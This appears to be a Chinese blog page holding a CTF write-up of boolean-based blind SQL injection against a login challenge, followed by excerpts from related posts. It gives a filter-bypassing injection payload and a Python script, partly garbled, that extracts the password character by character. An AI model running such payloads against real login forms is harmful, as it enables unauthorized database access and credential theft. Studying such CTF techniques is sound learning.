[ctf學習]基於布林的sql盲注
提 示: 基於布林的sql盲注訪問題目,又是乙個web login登陸介面,根據提示可以大概猜測是乙個sql post注入題。描 述: sql注入
123#當username=admin時提示password error
#可知使用者名為 admin
#對username進行注入時,發現<>=都被過濾了,不過or沒有被過濾
#我這邊使用username=a'or(1) or(0)%23 進行sql注入判斷
#將使用者名稱故意輸錯來獲得回顯判斷構造payload
username=admi'or((
ascii
(substr((
select
(password)
)from(1
)))-
48))%
23&password=
123
import requests
import time
url =
""headers =
with requests.session(
)as s:
database =
"passwd:"
s.keep_alive =
false
s.adapters.default_retries =
5for i in
range(1
,32):
for j in
range(48
,128):
sql =
'admi\'or((ascii(substr((select(password))from()))-))--\''
.format
(i,j)
data =
try:
res = s.post(url,data=data,timeout=
5,headers=headers)
except
: time.sleep(2)
res = s.post(url,data=data,timeout=
5,headers=headers)
if'username does not exist'
in res.text:
database +=
chr(j)
print
(database)
break
res.close(
)#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a
謝謝** 滲透測試 SQL盲注基於布林的盲注
普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...
bugku基於布林的SQL盲注
解題思路 我用使用者名稱admin,密碼123456,提示密碼錯誤 我用使用者名稱admina,密碼123456,提示使用者名稱錯誤,說明使用者名稱是admin 我的字典sql盲注無法破解密碼,於是我在網上找了乙個大佬寫的pycharm指令碼 記得安裝requests庫和改url import re...
SQL注入 布林盲注
可以進行sql注入,但是不能通過sql注入漏洞看到資料庫中的資訊,但是可以通過真假判斷資料庫中的資訊 布林盲注的方法 構造邏輯判斷語句,判斷資訊的真假,取出所有的真值 以less 8為例 還是老步驟,初步判斷是否存在sql注入漏洞 返回you are in 無返回 可以初步判斷存在sql注入漏洞,並...